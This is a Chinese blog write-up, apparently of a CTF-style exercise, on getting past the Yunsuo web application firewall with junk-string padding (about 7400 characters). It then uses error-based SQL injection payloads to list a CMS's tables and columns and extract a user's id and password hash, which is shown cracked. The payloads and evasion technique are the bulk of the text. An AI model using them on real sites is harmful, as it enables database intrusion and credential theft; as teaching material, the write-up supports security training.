SQL报错盲注绕过云锁

SQL报错盲注绕过云锁

在这里插入图片描述

有锁

在这里插入图片描述

还是被拦截了,怎么办?
我们要知道对方负责检测我们的语句是否存在恶意代码,对方是装了一个工具,但是工具运行要占用系统内存,对于这种防护类软件占用系统资源还是比较高的,而对于一台服务器来说资源是很宝贵的,而这些所谓的杀毒软件和防护软件,他们检测的数据越多,消耗的资源也就越大导致网站越来越卡,影响正常用户体验,所以说出于用户体验感的目的,这个服务器的防护软件检测数据的长度或内容是有限的,那只有我们把间谍或特务放后面,他就检测不到了,绕过检测了,所以我们可以给他大量的垃圾字符串,当他检测到一定值时就不检测了,所以就绕过了。
那垃圾字符串放多长呢?
我们不知道,只能一个一个试,一边加一边go

在这里插入图片描述

大概长度:7400

在这里插入图片描述

查询表名:

(0x23,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1)),1)

因为这个是cms,只需知道表名格式即可,无需查找字段名

[
在这里插入图片描述

依次爆出其他表名

在这里插入图片描述

查询到表名格式:#__assets,…
接下来爆破查询表名
为方便查看

在这里插入图片描述

在这里插入图片描述

从结果中搜寻

在这里插入图片描述

找到我们想要的

在这里插入图片描述

再查询字段名,里面有#

(0x23,concat(0x7e,(select column_name from information_schema.columns where table_name='#__user_flag' limit 0,1)),1)

用这个查字段名

(1,concat(0x7e,(select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema=database() limit 64,1) limit 0,1)),1)

在这里插入图片描述

在这里插入图片描述

id passwd

具体内容

(1,concat(0x7e,(select id from #__user_flag limit 0,1)),1)
(1,concat(0x7e,(select passwd from #__user_flag limit 0,1)),1)

在这里插入图片描述

id: WhatsUp
passwd: 68e109f0f40ca72a15e05cc22786f8
md5解密: HelloWorld

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

crabin_lpb

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值